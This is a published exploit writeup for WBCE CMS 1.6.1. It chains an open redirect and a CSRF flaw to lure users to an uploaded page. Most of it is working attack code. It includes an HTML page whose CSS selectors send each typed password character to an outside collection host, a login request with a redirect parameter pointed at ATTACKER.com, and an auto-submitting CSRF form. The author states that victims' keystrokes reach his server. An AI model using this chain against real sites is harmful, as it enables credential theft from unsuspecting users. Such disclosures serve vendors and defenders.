Share
## https://sploitus.com/exploit?id=PACKETSTORM:173287
Exploit Title: WBCE CMS 1.6.1 - Open Redirect & CSRF  
Version: 1.6.1  
Bugs: Open Redirect + CSRF = CSS KEYLOGGING  
Technology: PHP  
Vendor URL: https://wbce-cms.org/  
Software Link: https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1  
Date of found: 03-07-2023  
Author: Mirabbas Ağalarov  
Tested on: Linux   
  
  
2. Technical Details & POC  
========================================  
  
1. Login to Account  
2. Go to Media (http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/index.php#elf_l1_Lw)  
3. Then you upload html file .(html file content is as below)  
  
'''  
<html>  
<head>  
<title>  
Login  
</title>  
<style>  
input[type="password"][value*="q"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/q');}  
input[type="password"][value*="w"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/w');}  
input[type="password"][value*="e"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/e');}  
input[type="password"][value*="r"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/r');}  
input[type="password"][value*="t"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/t');}  
input[type="password"][value*="y"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/y');}  
input[type="password"][value*="u"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/u');}  
input[type="password"][value*="i"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/i');}  
input[type="password"][value*="o"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/o');}  
input[type="password"][value*="p"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/p');}  
input[type="password"][value*="a"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/a');}  
input[type="password"][value*="s"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/s');}  
input[type="password"][value*="d"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/d');}  
input[type="password"][value*="f"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/f');}  
input[type="password"][value*="g"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/g');}  
input[type="password"][value*="h"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/h');}  
input[type="password"][value*="j"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/j');}  
input[type="password"][value*="k"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/k');}  
input[type="password"][value*="l"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/l');}  
input[type="password"][value*="z"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/z');}  
input[type="password"][value*="x"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/x');}  
input[type="password"][value*="c"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/c');}  
input[type="password"][value*="v"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/v');}  
input[type="password"][value*="b"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/b');}  
input[type="password"][value*="n"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/n');}  
input[type="password"][value*="m"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/m');}  
input[type="password"][value*="Q"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/Q');}  
input[type="password"][value*="W"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/W');}  
input[type="password"][value*="E"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/E');}  
input[type="password"][value*="R"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/R');}  
input[type="password"][value*="T"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/T');}  
input[type="password"][value*="Y"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/Y');}  
input[type="password"][value*="U"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/U');}  
input[type="password"][value*="I"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/I');}  
input[type="password"][value*="O"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/O');}  
input[type="password"][value*="P"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/P');}  
input[type="password"][value*="A"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/A');}  
input[type="password"][value*="S"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/S');}  
input[type="password"][value*="D"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/D');}  
input[type="password"][value*="F"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/F');}  
input[type="password"][value*="G"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/G');}  
input[type="password"][value*="H"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/H');}  
input[type="password"][value*="J"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/J');}  
input[type="password"][value*="K"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/K');}  
input[type="password"][value*="L"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/L');}  
input[type="password"][value*="Z"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/Z');}  
input[type="password"][value*="X"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/X');}  
input[type="password"][value*="C"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/C');}  
input[type="password"][value*="V"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/V');}  
input[type="password"][value*="B"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/B');}  
input[type="password"][value*="N"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/N');}  
input[type="password"][value*="M"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/M');}  
input[type="password"][value*="1"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/1');}  
input[type="password"][value*="2"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/2');}  
input[type="password"][value*="3"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/3');}  
input[type="password"][value*="4"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/4');}  
input[type="password"][value*="5"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/5');}  
input[type="password"][value*="6"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/6');}  
input[type="password"][value*="7"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/7');}  
input[type="password"][value*="8"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/8');}  
input[type="password"][value*="9"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/9');}  
input[type="password"][value*="0"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/0');}  
input[type="password"][value*="-"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/-');}  
input[type="password"][value*="."]{  
background-image: url('https://enflownwx6she.x.pipedream.net/.');}  
input[type="password"][value*="_"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/%60');}  
input[type="password"][value*="@"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/%40');}  
input[type="password"][value*="?"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/%3F');}  
input[type="password"][value*=">"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/%3E');}  
input[type="password"][value*="<"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/%3C');}  
input[type="password"][value*="="]{  
background-image: url('https://enflownwx6she.x.pipedream.net/%3D');}  
input[type="password"][value*=":"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/%3A');}  
input[type="password"][value*=";"]{  
background-image: url('https://enflownwx6she.x.pipedream.net/%3B');}  
</style>  
</head>  
<body>  
<label>Please enter username and password</label>  
<br><br>  
Password:: <input type="password" />  
<script>  
document.querySelector('input').addEventListener('keyup', (evt)=>{  
evt.target.setAttribute('value', evt.target.value);  
})  
</script>  
</body>  
</html>  
'''  
  
4.Then go to url of html file (http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html) and copy url.  
5.Then you logout account and go to again login page (http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php)  
  
  
POST /WBCE_CMS-1.6.1/wbce/admin/login/index.php HTTP/1.1  
Host: localhost  
Content-Length: 160  
Cache-Control: max-age=0  
sec-ch-ua:   
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: ""  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: phpsessid-2729-sid=3i7oqonhjf0ug0jl5dfdp4uugg  
Connection: close  
  
url=&username_fieldname=username_3584B221EC89&password_fieldname=password_3584B221EC89&username_3584B221EC89=test&password_3584B221EC89=Hello123%21&submit=Login  
  
6.If write as (https://ATTACKER.com) in url parameter on abowe request on you redirect to attacker.com.  
7.We write to html files url  
  
url=http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html  
  
8.And create csrf-poc with csrf.poc.generator  
  
<html>  
<title>  
This CSRF was found by miri  
</title>  
<body>  
<h1>  
CSRF POC  
</h1>  
<form action="http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php" method="POST" enctype="application/x-www-form-urlencoded">  
<input type="hidden" name="url" value="http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html" />  
</form>  
<script>document.forms[0].submit();</script>  
</body>  
</html>  
  
  
9.If victim click , ht redirect to html file and this page send to my server all keyboard activity of victim.  
  
  
Poc video : https://youtu.be/m-x_rYXTP9E